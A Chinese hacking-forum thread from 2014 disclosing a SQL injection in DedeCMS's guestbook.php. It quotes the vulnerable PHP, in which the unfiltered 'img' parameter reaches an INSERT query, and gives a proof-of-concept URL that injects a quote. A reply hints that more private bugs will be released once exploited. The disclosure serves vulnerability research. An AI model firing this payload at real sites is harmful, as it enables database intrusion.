查看: 10651|回复: 1

Dedecms 注入漏洞9

[复制链接]
  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-2-28 03:08:55 | 显示全部楼层 |阅读模式
    [AppleScript] 纯文本查看 复制代码
    <pre><code>else if($action=='save')
    {
        if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE
     
    ['GUEST_BOOK_POS'];
        else $GUEST_BOOK_POS = 'guestbook.php';
        if(empty($validate)) $validate=='';
        else $validate = strtolower($validate);
        $svali = GetCkVdValue();
        if($validate=='' || $validate!=$svali)
        {
             ShowMsg("验证码不正确!","");
             exit();
        }
        $ip = GetIP();
        $dtime = time();
        $uname = trimMsg($uname);
        $email = trimMsg($email);
        $homepage = trimMsg($homepage);
        $homepage = preg_replace("#http:\/\/#", '', $homepage);
        $qq = trimMsg($qq);
        $msg = trimMsg(cn_substrR($msg, 1024), 1);
        $tid = empty($tid) ? 0 : intval($tid);
        $reid = empty($reid) ? 0 : intval($reid);
     
        if($msg=='' || $uname=='') {
            showMsg('你的姓名和留言内容不能为空!','-1');
            exit();
        }
        $title = HtmlReplace( cn_substrR($title,60), 1 );
        if($title=='') $title = '无标题';
         
        if($reid != 0)
        {
            $row = $dsql-&gt;GetOne("SELECT msg FROM `#@__guestbook` WHERE 
     
    id='$reid' ");
            $msg = "&lt;div class=\\'rebox\\'&gt;".addslashes($row
     
    ['msg'])."&lt;/div&gt;\n".$msg;
        }
     
        $query = "INSERT INTO `#@__guestbook`
     
    (title,tid,mid,uname,email,homepage,qq,face,msg,ip,dtime,ischeck)
                      VALUES 
     
    ('$title','$tid','{$g_mid}','$uname','$email','$homepage','$qq','$img','$ms
     
    g','$ip','$dtime','$needCheck'); ";
                      echo $query;//img没有过滤
        $dsql-&gt;ExecuteNoneQuery($query);
        $gid = $dsql-&gt;GetLastID();</code></pre>

    漏洞证明:

    测试方法127.0.0.1/dede/plus/guestbook.php?

    action=save&validate=scuf&msg=1&uname=1&img=111'

    吧SCUF改成你自己的验证码就哦了 我就不写exp了。。我没安装留言~
    33333333333333.jpg
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2015-12-28 00:09
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-2-28 22:09:23 | 显示全部楼层
    操着一手乌云的好牌

    点评

    还有很多 内部的 等玩烂的在放出来  发表于 2014-2-28 23:57
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-5-18 18:22 , Processed in 0.027392 second(s), 20 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部